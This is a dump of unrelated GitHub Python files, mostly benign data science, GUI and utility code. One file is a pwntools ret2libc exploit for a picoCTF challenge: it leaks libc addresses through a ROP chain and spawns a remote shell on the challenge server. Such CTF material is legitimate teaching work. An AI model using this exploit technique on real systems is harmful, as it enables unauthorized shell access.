function to annotate a heatmap.\n\n Parameters\n ----------\n im\n The AxesImage to be labeled.\n data\n Data used to annotate. If None, the image's data is used. Optional.\n valfmt\n The format of the annotations inside the heatmap. This should either\n use the string format method, e.g. \"$ {x:.2f}\", or be a\n `matplotlib.ticker.Formatter`. Optional.\n textcolors\n A list or array of two color specifications. The first is used for\n values below a threshold, the second for those above. Optional.\n threshold\n Value in data units according to which the colors from textcolors are\n applied. If None (the default) uses the middle of the colormap as\n separation. Optional.\n **kwargs\n All other arguments are forwarded to each call to `text` used to create\n the text labels.\n \"\"\"\n\n if not isinstance(data, (list, np.ndarray)):\n data = im.get_array()\n\n # Normalize the threshold to the images color range.\n if threshold is not None:\n threshold = im.norm(threshold)\n else:\n threshold = im.norm(data.max()) / 2.0\n\n # Set default alignment to center, but allow it to be\n # overwritten by textkw.\n kw = dict(horizontalalignment=\"center\", verticalalignment=\"center\")\n kw.update(textkw)\n\n # Get the formatter in case a string is supplied\n if isinstance(valfmt, str):\n valfmt = matplotlib.ticker.StrMethodFormatter(valfmt)\n\n # Loop over the data and create a `Text` for each \"pixel\".\n # Change the text's color depending on the data.\n texts = []\n for i in range(data.shape[0]):\n for j in range(data.shape[1]):\n kw.update(color=textcolors[int(im.norm(data[i, j]) > threshold)])\n text = im.axes.text(j, i, valfmt(data[i, j], None), **kw)\n texts.append(text)\n\n return texts\n\n\nif __name__ == \"__main__\":\n loss_list = [0.00000001, 0.5, 0.6, 0.4, 0.55, 0.95]\n k = loss2weight(loss_list, scaling_type=\"const\", factor=1.15)\n print(k)","repo_name":"ZuchniakK/VotingAlgorithms","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72468569052","text":"from sys import stdin\nfrom collections import deque\ninput = stdin.readline\n\nn, num_of_pop = map(int, input().split())\nwant_to_pop = list(map(int, input().split()))\nq = deque([ii for ii in range(1, n+1)])\ncount = 0\n\nfor ww in want_to_pop:\n target_index = q.index(ww)\n rotate_direction = -1 if target_index <= len(q) - target_index else 1\n while q[0] != ww:\n q.rotate(rotate_direction)\n count += 1\n q.popleft()\n\nprint(count)\n","repo_name":"jaypae95/problem-solving","sub_path":"deque/백준_1021_회전하는큐.py","file_name":"백준_1021_회전하는큐.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39957473109","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom MVG import logpdf_GAU_ND_fast, vcol, vrow, logpdf_GAU_ND\n\n\ndef loglikelihood(XND, m_ML, C_ML):\n \n MVG = logpdf_GAU_ND_fast(XND, m_ML, C_ML)\n ll = np.sum(MVG)\n \n return ll\n\ndef compute_loglikelihood(data_matrix):\n \n N = data_matrix.shape[1]\n mu = vcol(data_matrix.mean(1)) \n DC = data_matrix - mu \n C = np.dot(DC, DC.T)/N\n ll = loglikelihood(data_matrix, mu, C)\n \n return ll,mu,C\n \n \nif __name__ == '__main__':\n \n # LIKELIHOOD ESTIMATE FOR A GENERIC MATRIX\n XND = np.load(\"utils/XND.npy\")\n ll1 = compute_loglikelihood(XND)[0]\n print(ll1)\n # LIKELIHOOD FOR ONE DIMENSIONAL SAMPLES\n X1D = np.load('utils/X1D.npy')\n ll2,mu,C = compute_loglikelihood(X1D)\n print(ll2)\n \n plt.figure()\n plt.hist(X1D.ravel(), bins=50, density=True)\n XPlot = np.linspace(-8, 12, 1000)\n plt.plot(XPlot.ravel(), np.exp(logpdf_GAU_ND(vrow(XPlot), mu, C)))\n plt.show()\n plt.savefig(\"images/One_dimension_MLE.pdf\")\n ","repo_name":"Nicocarad/Machine_Learining_and_Pattern_Recognition","sub_path":"Laboratory/Lab4/MLE.py","file_name":"MLE.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29076495917","text":"#%%\r\nimport os\r\nimport fnmatch\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\n\r\n#%%\r\n\"\"\"\r\n6.1 Create a table/data frame with the closing prices of 30 different \r\nstocks, with 10 from each of the caps\r\n\r\n6.2 Calculate average annual percentage return and volatility of all \r\n30 stocks over a theoretical one year period.\r\n\"\"\"\r\ncaps = [\"Large_Cap/Large_Cap\",\r\n \"Mid_Cap\",\r\n \"Small_Cap\"\r\n ]\r\n\r\ndfs = {}\r\ndailyValues = {}\r\nannualValues = {}\r\nfor cap in caps:\r\n i=1\r\n \r\n for file_name in os.listdir('Data/'+f\"{cap}\"): \r\n if fnmatch.fnmatch(file_name, '*.csv') and i<11:\r\n name = file_name.split('.')[0] # getting the name without extension\r\n dfs[name] = pd.read_csv(f'Data/{cap}/{file_name}') # making df out of csv file\r\n\r\n # preprocessing\r\n dfs[name] = dfs[name][dfs[name][\"Series\"] == \"EQ\"] \r\n dfs[name].Date = pd.to_datetime(dfs[name]['Date'])\r\n dfs[name] = dfs[name].set_index('Date')\r\n \r\n # calculating values i.e. mean and std\r\n dfs[name][\"dailyChange\"] = dfs[name][\"Close Price\"].pct_change()\r\n dfs[name].dropna(inplace = True)\r\n \r\n # (std, mean)\r\n dailyValues[name] = [dfs[name].dailyChange.std(), dfs[name].dailyChange.mean()]\r\n annualValues[name] = [dailyValues[name][0]*(252**0.5), dailyValues[name][1]*252]\r\n \r\n i +=1\r\nprint('(name: [std, mean])')\r\nprint(' -- -- -- Daily')\r\nfor i in dailyValues.items():\r\n print(i)\r\n \r\nprint('')\r\nprint(' -- -- -- Annual') \r\nfor i in annualValues.items():\r\n print(i)\r\n \r\n#%%\r\n\"\"\"\r\n6.3 Cluster the 30 stocks according to their mean annual Volatilities \r\nand Returns using K-means clustering. Identify the optimum number of \r\nclusters using the Elbow curve method\r\n\"\"\"\r\ndata = pd.DataFrame.from_dict(annualValues, orient='index', columns=[\"std\", \"mean\"])\r\n\r\n#%%\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.cluster import KMeans\r\n\r\n# Transforming data\r\nmms = MinMaxScaler()\r\nmms.fit(data)\r\ntransformedData = mms.transform(data)\r\n\r\n# calculating Inertia avrage dist. b/w the cluster center and its points\r\nSum_of_squared_distances = []\r\nK = range(1, 31)\r\nfor k in K:\r\n km = KMeans(n_clusters=k)\r\n km = km.fit(transformedData)\r\n Sum_of_squared_distances.append(km.inertia_)\r\n\r\n# Plotting the Elbow Method Graph\r\nfig, ax = plt.subplots(figsize=(10, 5))\r\n\r\nax.plot(K, Sum_of_squared_distances, 'bx-')\r\n\r\nplt.xticks(K)\r\nplt.xlabel('k')\r\n\r\n# plt.yticks(Sum_of_squared_distances)\r\nplt.ylabel('Sum_of_squared_distances')\r\n\r\nplt.title('Elbow Method For Optimal k')\r\nplt.show()\r\n\r\n#%%\r\n\"\"\"\r\n6.4 Prepare a separate Data frame to show which stocks belong to the \r\nsame cluster \r\n\"\"\"\r\n# Using k=6\r\nk=6\r\nkm = KMeans(n_clusters=k)\r\nkm = km.fit(transformedData)\r\n\r\n#%%\r\ndata['labels'] = km.labels_\r\ncenters = km.cluster_centers_\r\ny_kmeans = km.predict(transformedData)\r\n\r\n#%%\r\nplt.style.use('bmh')\r\n\r\nfig, ax = plt.subplots(figsize=(10, 6))\r\nax.scatter(transformedData[:, 0], \r\n transformedData[:, 1], \r\n c=y_kmeans, \r\n s=50, \r\n cmap='viridis'\r\n )\r\n\r\nax.scatter(centers[:, 0], \r\n centers[:, 1], \r\n c='black', \r\n s=8000, \r\n alpha=0.05\r\n )\r\n\r\nfont = {'family': 'serif',\r\n 'color': 'black',\r\n 'weight': 'normal',\r\n 'size': 6,\r\n }\r\n\r\nfor x, y, name in zip(transformedData[:, 0], transformedData[:, 1], data.index):\r\n ax.text(x, \r\n y, \r\n name, \r\n fontdict=font,\r\n # verticalalignment='center', \r\n # horizontalalignment='center',\r\n rotation=0\r\n )\r\n\r\n\r\nfont = {'family': 'serif',\r\n 'color': 'gray',\r\n 'weight': 'normal',\r\n 'size': 28,\r\n }\r\n\r\nfor i, cord in enumerate(centers):\r\n ax.text(cord[0], \r\n cord[1], \r\n f\"C{i}\",\r\n horizontalalignment='center',\r\n verticalalignment='center', \r\n fontdict=font, \r\n rotation=0, \r\n alpha=0.3\r\n )\r\n\r\nplt.title('K-Means Clustering')\r\nplt.show()\r\n#%%\r\n","repo_name":"abecus/CareerLauncherMlInternship","sub_path":"mod6.py","file_name":"mod6.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30386775903","text":"from sgtk import Hook\n\n\nclass HieroResolveCustomStrings(Hook):\n \"\"\"Translates a keyword string into its resolved value for a given task.\"\"\"\n # cache of shots that have already been pulled from shotgun\n _sg_lookup_cache = {}\n\n def execute(self, task, keyword, **kwargs):\n \"\"\"\n The default implementation of the custom resolver simply looks up\n the keyword from the shotgun shot dictionary.\n\n For example, to pull the shot code, you would simply specify 'code'.\n To pull the sequence code you would use 'sg_sequence.Sequence.code'.\n \"\"\"\n\n if keyword == \"{Episode}\":\n episode_entity = self.parent.execute_hook_method(\n \"hook_get_shot\",\n \"get_episode\",\n data=self.parent.preprocess_data,\n hiero_sequence=task._item.parentSequence(),\n )\n # hard coded to return the name of the episode\n # if however your folder for the episode in the schema, is not just made up from the code field\n # you need to get it to return what ever string value the folder would normally be created with.\n return episode_entity['code']\n\n shot_code = task._item.name()\n\n # grab the shot from the cache, or the get_shot hook if not cached\n sg_shot = self._sg_lookup_cache.get(shot_code)\n if sg_shot is None:\n fields = [ctf['keyword'] for ctf in self.parent.get_setting('custom_template_fields')]\n sg_shot = self.parent.execute_hook(\n \"hook_get_shot\",\n task=task,\n item=task._item,\n data=self.parent.preprocess_data,\n fields=fields,\n upload_thumbnail=False,\n )\n\n self._sg_lookup_cache[shot_code] = sg_shot\n\n self.parent.log_info(\"_sg_lookup_cache: %s\" % (self._sg_lookup_cache))\n\n if sg_shot is None:\n raise RuntimeError(\"Could not find shot for custom resolver: %s\" % keyword)\n\n # strip off the leading and trailing curly brackets\n keyword = keyword[1:-1]\n result = sg_shot.get(keyword, \"\")\n\n self.parent.log_debug(\"Custom resolver: %s[%s] -> %s\" % (shot_code, keyword, result))\n\n return result","repo_name":"EntropyZeroStudio/Shotgun-Toolkit-Default-Config","sub_path":"hooks/tk-hiero-export/hiero_resolve_custom_strings.py","file_name":"hiero_resolve_custom_strings.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"16217768676","text":"import json\r\nimport os\r\nimport random\r\n\r\nclass RoleManager:\r\n def __init__(self, roles):\r\n self.roles = roles\r\n self.file_path = 'role.json'\r\n self.ensure_file_exists()\r\n\r\n def ensure_file_exists(self):\r\n if not os.path.exists(self.file_path):\r\n with open(self.file_path, \"w\") as f:\r\n json.dump({}, f)\r\n\r\n def read_role_data(self):\r\n with open(self.file_path, 'r') as f:\r\n return json.load(f)\r\n\r\n def write_role_data(self, data):\r\n with open(self.file_path, 'w') as f:\r\n json.dump(data, f)\r\n\r\n def get_role(self, user_id):\r\n role_data = self.read_role_data()\r\n return role_data.get(user_id, None)\r\n\r\n def set_role(self, user_id, role):\r\n role_data = self.read_role_data()\r\n role_data[user_id] = role\r\n self.write_role_data(role_data)\r\n\r\n def extract_random_role(self, user_id):\r\n user_role = self.get_role(user_id)\r\n if user_role is None:\r\n chosen_role = random.choice(self.roles)\r\n role = {\r\n \"name\": chosen_role,\r\n \"attack\": random.randint(10, 100),\r\n \"defense\": random.randint(10, 100),\r\n \"speed\": random.randint(10, 100)\r\n }\r\n self.set_role(user_id, role)\r\n return chosen_role\r\n else:\r\n return None\r\n","repo_name":"shixu915/shixu915.github.io","sub_path":"cute/role_manager.py","file_name":"role_manager.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8310045441","text":"#!/usr/bin/env python3\nimport tkinter as tk\nimport random\n\n\ndef calcular_ganador_piedra():\n eleccion_jugador = \"Piedra\"\n eleccion_cpu = random.randint(0, 2)\n\n if eleccion_jugador == \"Piedra\" and eleccion_cpu == 0:\n imagen_respuesta.configure(image=imagen_piedra)\n resultado = \"Empate\"\n\n elif eleccion_jugador == \"Piedra\" and eleccion_cpu == 1:\n imagen_respuesta.configure(image=imagen_papel)\n resultado = \"Derrota\"\n label_puntaje_cpu.configure(text=int(label_puntaje_cpu.cget(\"text\")) + 1)\n\n elif eleccion_jugador == \"Piedra\" and eleccion_cpu == 2:\n imagen_respuesta.configure(image=imagen_tijera)\n resultado = \"Victoria\"\n label_puntaje_jugador.configure(\n text=int(label_puntaje_jugador.cget(\"text\")) + 1\n )\n\n label_resultado.configure(text=resultado)\n\n\ndef calcular_ganador_papel():\n eleccion_jugador = \"Papel\"\n eleccion_cpu = random.randint(0, 2)\n\n if eleccion_jugador == \"Papel\" and eleccion_cpu == 0:\n imagen_respuesta.configure(image=imagen_piedra)\n resultado = \"Victoria\"\n label_puntaje_jugador.configure(\n text=int(label_puntaje_jugador.cget(\"text\")) + 1\n )\n\n elif eleccion_jugador == \"Papel\" and eleccion_cpu == 1:\n imagen_respuesta.configure(image=imagen_papel)\n resultado = \"Empate\"\n\n elif eleccion_jugador == \"Papel\" and eleccion_cpu == 2:\n imagen_respuesta.configure(image=imagen_tijera)\n resultado = \"Derrota\"\n label_puntaje_cpu.configure(text=int(label_puntaje_cpu.cget(\"text\")) + 1)\n label_resultado.configure(text=resultado)\n\n\ndef calcular_ganador_tijera():\n eleccion_jugador = \"Tijera\"\n eleccion_cpu = random.randint(0, 2)\n\n if eleccion_jugador == \"Tijera\" and eleccion_cpu == 0:\n imagen_respuesta.configure(image=imagen_piedra)\n resultado = \"Derrota\"\n label_puntaje_cpu.configure(text=int(label_puntaje_cpu.cget(\"text\")) + 1)\n\n elif eleccion_jugador == \"Tijera\" and eleccion_cpu == 1:\n imagen_respuesta.configure(image=imagen_papel)\n resultado = \"Victoria\"\n label_puntaje_jugador.configure(\n text=int(label_puntaje_jugador.cget(\"text\")) + 1\n )\n\n elif eleccion_jugador == \"Tijera\" and eleccion_cpu == 2:\n imagen_respuesta.configure(image=imagen_tijera)\n resultado = \"Empate\"\n\n label_resultado.configure(text=resultado)\n\n\nventana_principal = tk.Tk()\nventana_principal.geometry(\"500x800\")\nventana_principal.resizable(False, False)\nventana_principal.configure(\n background=\"#9BC4BC\", highlightbackground=\"black\", highlightthickness=8\n)\n\nlabel_titulo = tk.Label(\n text=\"Piedra, papel o tijera!\",\n background=\"#9BC4BC\",\n foreground=\"#090909\",\n font=(\"Verdana\", 20, \"bold\"),\n)\nlabel_titulo.place(x=90, y=20)\n\nlabel_puntaje_cpu = tk.Label(\n text=0, background=\"#9BC4BC\", foreground=\"#4B5043\", font=(\"Consolas\", 30, \"bold\")\n)\nlabel_puntaje_cpu.place(x=380, y=70)\n\nlabel_puntaje_jugador = tk.Label(\n text=0, background=\"#9BC4BC\", foreground=\"#4B5043\", font=(\"Consolas\", 30, \"bold\")\n)\nlabel_puntaje_jugador.place(x=120, y=70)\n\nimagen_piedra = tk.PhotoImage(file=\"piedra.png\")\nboton_piedra = tk.Button(\n ventana_principal,\n background=\"white\",\n image=imagen_piedra,\n borderwidth=5,\n relief=\"raised\",\n command=calcular_ganador_piedra,\n)\nboton_piedra.place(x=55, y=125)\n\nimagen_papel = tk.PhotoImage(file=\"papel.png\")\nboton_papel = tk.Button(\n ventana_principal,\n background=\"white\",\n image=imagen_papel,\n borderwidth=5,\n relief=\"raised\",\n command=calcular_ganador_papel,\n)\nboton_papel.place(x=55, y=310)\n\nimagen_tijera = tk.PhotoImage(file=\"tijera.png\")\nboton_tijera = tk.Button(\n ventana_principal,\n background=\"white\",\n image=imagen_tijera,\n borderwidth=5,\n relief=\"raised\",\n command=calcular_ganador_tijera,\n)\nboton_tijera.place(x=55, y=550)\n\nlabel_resultado = tk.Label(\n text=\"\", background=\"#9BC4BC\", foreground=\"#4B5043\", font=(\"Verdana\", 15, \"bold\")\n)\nlabel_resultado.place(x=220, y=75)\n\nimagen_respuesta = tk.Label(image=\"\", background=\"#9BC4BC\")\nimagen_respuesta.place(x=320, y=310)\n\nlabel_firma = tk.Label(\n text=\"[smc]\", background=\"#9BC4BC\", font=(\"monospace\", 20, \"bold\")\n)\nlabel_firma.place(x=400, y=740)\n\nventana_principal.mainloop()\n","repo_name":"sanmacorz/ejercicios-fundamentos","sub_path":"ejercicios-tkinter/ejercicio4.py","file_name":"ejercicio4.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"86480404708","text":"import os\n\nADD_TAG = 1\nSEE_TAG_LIST = 2\nGO_BACK = 3\n\ndef tagMenu():\n '''\n Tag menu where user is able to choose an option between add tag,\n see a tag or go back to main menu\n '''\n os.system('clear')\n\n print('\\nTAG MENU')\n\n print('\\n1 -> Add tag')\n print('2 -> See tag list')\n print('3 -> Go Back main menu')\n \n try:\n option = int(input('\\nChoose a number: '))\n except:\n os.system('clear')\n print('\\nNot a number!\\n')\n # to see this menu again\n return tagMenu()\n else:\n if option >= ADD_TAG or option <= GO_BACK:\n os.system('clear')\n # to see selected option\n return option\n else:\n os.system('clear')\n print('\\nNumber out range!\\n')\n # to see this menu again\n return tagMenu()\n","repo_name":"Sebas-Ar/Safe-password-v0.1","sub_path":"view/menu/tagMenu.py","file_name":"tagMenu.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1136593023","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom http_filter.http.parser import HTTPParser\nfrom http_filter.query.parser import QueryParser\n\n\nclass Matcher:\n def __init__(self, http_packet: HTTPParser, query: QueryParser):\n self.httpPacket = http_packet\n self.query = query\n\n def matches(self) -> bool:\n if self.query.ast:\n return self.match_tree(self.query.ast)\n return True\n\n def match_tree(self, root) -> bool:\n if \"o\" in root:\n if root[\"o\"] == \"not\":\n return not self.match_tree(root[\"child\"])\n elif root[\"o\"] == \"or\":\n return self.match_tree(root[\"left\"]) or self.match_tree(\n root[\"right\"])\n elif root[\"o\"] == \"and\":\n return self.match_tree(root[\"left\"]) and self.match_tree(\n root[\"right\"])\n else:\n key = root[\"k\"]\n val = root[\"v\"]\n operation = root[\"f\"]\n return self.match_packet(key, val, operation)\n\n def match_packet(self, key, val, function) -> bool:\n if not (key in self.httpPacket):\n return False\n if function == \"==\":\n if type(self.httpPacket[key.lower()]) is str:\n return self.httpPacket[key.lower()] == val\n else:\n return \"\".join(self.httpPacket[key.lower()]) == val\n if function == \"=~\":\n if type(self.httpPacket[key.lower()]) is str:\n return val in self.httpPacket[key.lower()]\n else:\n return val in \"\".join(self.httpPacket[key.lower()])\n","repo_name":"rzaluska/tkom","sub_path":"http_filter/query/matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43570323339","text":"#!/usr/bin/python3\n\nfrom pwn import *\nimport struct\n\n#init\nelf = ELF(\"./vuln\")\n\n'''\n$ ldd vuln\n linux-vdso.so.1 (0x00007ffcd37f7000)\n libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f76e16e7000)\n /lib64/ld-linux-x86-64.so.2 (0x00007f76e18c5000)\n'''\n\n#selection on local or remote\nLOCAL = False\n\nif(LOCAL):\n\tlibc = ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")\n\tp = elf.process()\nelse:\n\thost = 'mercury.picoctf.net'\n\tport = 23584\n\tlibc = ELF(\"./libc/libc.so.6\")\n\tp = remote(host, port)\n\n\n#find RIP offset with gdb-peda & python printing patterns\n#found 136 padding\npadding = b\"A\"*136\n\n#find 'pop rdi; ret' with ROPgadget to make sure puts() get the puts GOT param \n#puts will print out the puts GOT from the rdi\n'''\n─$ ROPgadget --binary ./vuln | grep \"pop rdi\" 2 ⨯\n0x0000000000400913 : pop rdi ; ret\n'''\nropGadget = struct.pack(\" 'puts' into puts to print puts GOT)\nputsPLT = elf.plt['puts'] #puts in plt (call puts())\ndo_stuffFunc = struct.pack(\" pop rdi; ret; + binsh_address\n\tp64(ret),\n\tp64(system_address),\t#16 bytes => ret; + system_address\n\tp64(ret),\n\tp64(exit_address)\t#16 bytes => ret; exit_address\n\t])\n\n#sending payload spawning shell\np.sendline(payload)\np.interactive()\n\n\n\n","repo_name":"nobodyatall648/picoGym-CTF","sub_path":"pwn BinaryExploitation/Here's a LIBC/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24293355810","text":"import os\nimport sys\nsys.path.append(os.getcwd().split('src')[0])\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport pickle\nimport os\nimport time\nimport argparse\nimport numpy as np\nfrom torch_geometric.data import DataLoader\n\nfrom src.model.gcn import GCN\nfrom src.data_util.rna_family_graph_dataset import RNAFamilyGraphDataset\nfrom src.util.visualization_util import plot_loss\nfrom src.data_util.data_constants import word_to_ix, families\nfrom src.evaluation.evaluation_util import evaluate_family_classifier, compute_metrics_family\n\ntorch.manual_seed(0)\nnp.random.seed(0)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model_name', default=\"test\", help='model name')\nparser.add_argument('--device', default=\"cpu\", help='cpu or cuda')\nparser.add_argument('--n_samples', type=int, default=None, help='Number of samples to train on')\nparser.add_argument('--n_epochs', type=int, default=10000, help='Number of samples to train on')\nparser.add_argument('--embedding_dim', type=int, default=20, help='Dimension of nucleotide '\n 'embeddings')\nparser.add_argument('--hidden_dim', type=int, default=80, help='Dimension of hidden '\n 'representations of convolutional layers')\nparser.add_argument('--batch_size', type=int, default=64, help='Batch size')\nparser.add_argument('--learning_rate', type=float, default=0.0004, help='Learning rate')\nparser.add_argument('--seq_max_len', type=int, default=10000, help='Maximum length of sequences '\n 'used for training and testing')\nparser.add_argument('--seq_min_len', type=int, default=1, help='Maximum length of sequences '\n 'used for training and testing')\nparser.add_argument('--n_conv_layers', type=int, default=5, help='Number of convolutional layers')\nparser.add_argument('--conv_type', type=str, default=\"MPNN\", help='Type of convolutional layers')\nparser.add_argument('--dropout', type=float, default=0.1, help='Amount of dropout')\nparser.add_argument('--batch_norm', dest='batch_norm', action='store_true')\nparser.add_argument('--no_batch_norm', dest='batch_norm', action='store_false')\nparser.set_defaults(batch_norm=True)\nparser.add_argument('--residuals', type=bool, default=False, help='Whether to use residuals')\nparser.add_argument('--set2set_pooling', type=bool, default=True, help='Whether to use set2set '\n 'pooling')\nparser.add_argument('--early_stopping', type=int, default=30, help='Number of epochs for early '\n 'stopping')\nparser.add_argument('--verbose', type=bool, default=False, help='Verbosity')\nparser.add_argument('--foldings_dataset', type=str,\n default='../data/foldings.pkl', help='Path to foldings')\nparser.add_argument('--train_dataset', type=str,\n default='../data/train.fasta', help='Path to training '\n 'dataset')\nparser.add_argument('--val_dataset', type=str,\n default='../data/val.fasta', help='Path to val dataset')\n\n\nopt = parser.parse_args()\nprint(opt)\n\nn_classes = len(families)\nmodel = GCN(n_features=opt.embedding_dim, hidden_dim=opt.hidden_dim, n_classes=n_classes,\n n_conv_layers=opt.n_conv_layers,\n dropout=opt.dropout, batch_norm=opt.batch_norm, num_embeddings=len(word_to_ix),\n embedding_dim=opt.embedding_dim,\n node_classification=False, residuals=opt.residuals, device=opt.device,\n set2set_pooling=opt.set2set_pooling).to(opt.device)\n\nloss_function = nn.NLLLoss()\noptimizer = optim.Adam(model.parameters(), lr=opt.learning_rate)\n\n# Data Loading\nn_train_samples = None if not opt.n_samples else int(opt.n_samples * 0.8)\nn_val_samples = None if not opt.n_samples else int(opt.n_samples * 0.1)\n\ntrain_set = RNAFamilyGraphDataset(opt.train_dataset, opt.foldings_dataset,\n seq_max_len=opt.seq_max_len,\n seq_min_len=opt.seq_min_len,\n n_samples=n_train_samples)\nval_set = RNAFamilyGraphDataset(opt.val_dataset, opt.foldings_dataset, seq_max_len=opt.seq_max_len,\n seq_min_len=opt.seq_min_len,\n n_samples=n_val_samples)\n\ntrain_loader = DataLoader(train_set, batch_size=opt.batch_size, shuffle=True)\nval_loader = DataLoader(val_set, batch_size=opt.batch_size, shuffle=False)\n\ndef train_epoch(model, train_loader):\n model.train()\n losses = []\n accuracies = []\n\n for batch_idx, data in enumerate(train_loader):\n data.x = data.x.to(opt.device)\n data.edge_index = data.edge_index.to(opt.device)\n data.edge_attr = data.edge_attr.to(opt.device)\n data.batch = data.batch.to(opt.device)\n data.y = data.y.to(opt.device)\n\n model.zero_grad()\n\n out = model(data)\n\n # Loss is computed with respect to the target sequence\n loss = loss_function(out, data.y)\n losses.append(loss.item())\n loss.backward()\n optimizer.step()\n\n # Metrics are computed with respect to generated folding\n pred = out.max(1)[1]\n accuracy = compute_metrics_family(data.y, pred)\n accuracies.append(accuracy)\n\n avg_loss = np.mean(losses)\n avg_accuracy = np.mean(accuracies)\n\n print(\"training loss is {}\".format(avg_loss))\n print(\"accuracy: {}\".format(avg_accuracy))\n\n return avg_loss.item(), avg_accuracy\n\n\ndef run(model, n_epochs, train_loader, results_dir, model_dir):\n print(\"The model contains {} parameters\".format(sum(p.numel() for p in model.parameters() if p.requires_grad)))\n\n train_losses = []\n train_accuracies = []\n val_losses = []\n val_accuracies = []\n\n for epoch in range(n_epochs):\n start = time.time()\n print(\"Epoch {}: \".format(epoch + 1))\n\n loss, accuracy = train_epoch(model, train_loader)\n val_loss, val_accuracy = evaluate_family_classifier(model, val_loader,\n loss_function, mode='val',\n device=opt.device, verbose=opt.verbose)\n end = time.time()\n print(\"Epoch took {0:.2f} seconds\".format(end - start))\n\n if not val_accuracies or val_accuracy > max(val_accuracies):\n torch.save(model.state_dict(), model_dir + 'model.pt')\n print(\"Saved updated model\")\n #\n train_losses.append(loss)\n val_losses.append(val_loss)\n train_accuracies.append(accuracy)\n val_accuracies.append(val_accuracy)\n\n plot_loss(train_losses, val_losses,file_name=results_dir + 'loss.jpg')\n plot_loss(train_accuracies, val_accuracies, file_name=results_dir + 'acc.jpg',\n y_label='accuracy')\n\n pickle.dump({\n 'train_losses': train_losses,\n 'val_losses': val_losses,\n 'train_accuracies': train_accuracies,\n 'val_accuracies': val_accuracies,\n }, open(results_dir + 'scores.pkl', 'wb'))\n\n if len(val_accuracies) > opt.early_stopping and max(val_accuracies[-opt.early_stopping:])\\\n < max(val_accuracies):\n print(\"Training terminated because of early stopping\")\n print(\"Best val_loss: {}\".format(min(val_losses)))\n print(\"Best val_accuracy: {}\".format(max(val_accuracies)))\n\n with open(results_dir + 'scores.txt', 'w') as f:\n f.write(\"Best val_accuracy: {}\".format(max(\n val_accuracies)))\n break\n\n\ndef main():\n results_dir = '../results_family_classification/{}/'.format(opt.model_name)\n model_dir = '../models_family_classification/{}/'.format(opt.model_name)\n os.makedirs(results_dir, exist_ok=True)\n os.makedirs(model_dir, exist_ok=True)\n\n with open(results_dir + 'hyperparams.txt', 'w') as f:\n f.write(str(opt))\n\n with open(results_dir + 'hyperparams.pkl', 'wb') as f:\n pickle.dump(opt, f)\n\n run(model, opt.n_epochs, train_loader, results_dir, model_dir)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"emalgorithm/ncRNA-family-prediction","sub_path":"src/training/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":8430,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"9589404151","text":"from gpt import GPT\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom functools import partial\n\nfrom modeling_vqvae import _cfg\nfrom timm.models.registry import register_model\nfrom timm.models.layers import trunc_normal_ as __call_trunc_normal_\n\nfrom einops import rearrange\n\n\ndef trunc_normal_(tensor, mean=0., std=1.):\n __call_trunc_normal_(tensor, mean=mean, std=std, a=-std, b=std)\n\nclass ClassEncoder(nn.Module):\n \"\"\"Container module with an encoder, a recurrent or transformer module, and a decoder.\"\"\"\n\n def __init__(self, ninp, nhead, nlayers, nclasses=55, coord_vocab_size=256, latent_vocab_size=512, reso=128):\n super(ClassEncoder, self).__init__()\n self.reso = reso\n\n self.pos_emb = nn.Parameter(nn.Embedding(reso, ninp).weight[None]) \n\n self.x_tok_emb = nn.Embedding(coord_vocab_size, ninp)\n self.y_tok_emb = nn.Embedding(coord_vocab_size, ninp)\n self.z_tok_emb = nn.Embedding(coord_vocab_size, ninp)\n\n self.latent_tok_emb = nn.Embedding(latent_vocab_size, ninp)\n\n self.coord_vocab_size = coord_vocab_size\n\n self.latent_vocab_size = latent_vocab_size\n\n self.class_enc = nn.Embedding(nclasses, ninp)\n\n self.transformer = GPT(vocab_size=512, block_size=self.reso, n_layer=nlayers, n_head=nhead, n_embd=ninp, embd_pdrop=0.1, resid_pdrop=0.1, attn_pdrop=0.1)\n\n self.ln_x = nn.LayerNorm(ninp)\n self.x_head = nn.Linear(ninp, coord_vocab_size, bias=False)\n\n self.ln_y = nn.LayerNorm(ninp)\n self.y_head = nn.Linear(ninp, coord_vocab_size, bias=False)\n\n self.ln_z = nn.LayerNorm(ninp)\n self.z_head = nn.Linear(ninp, coord_vocab_size, 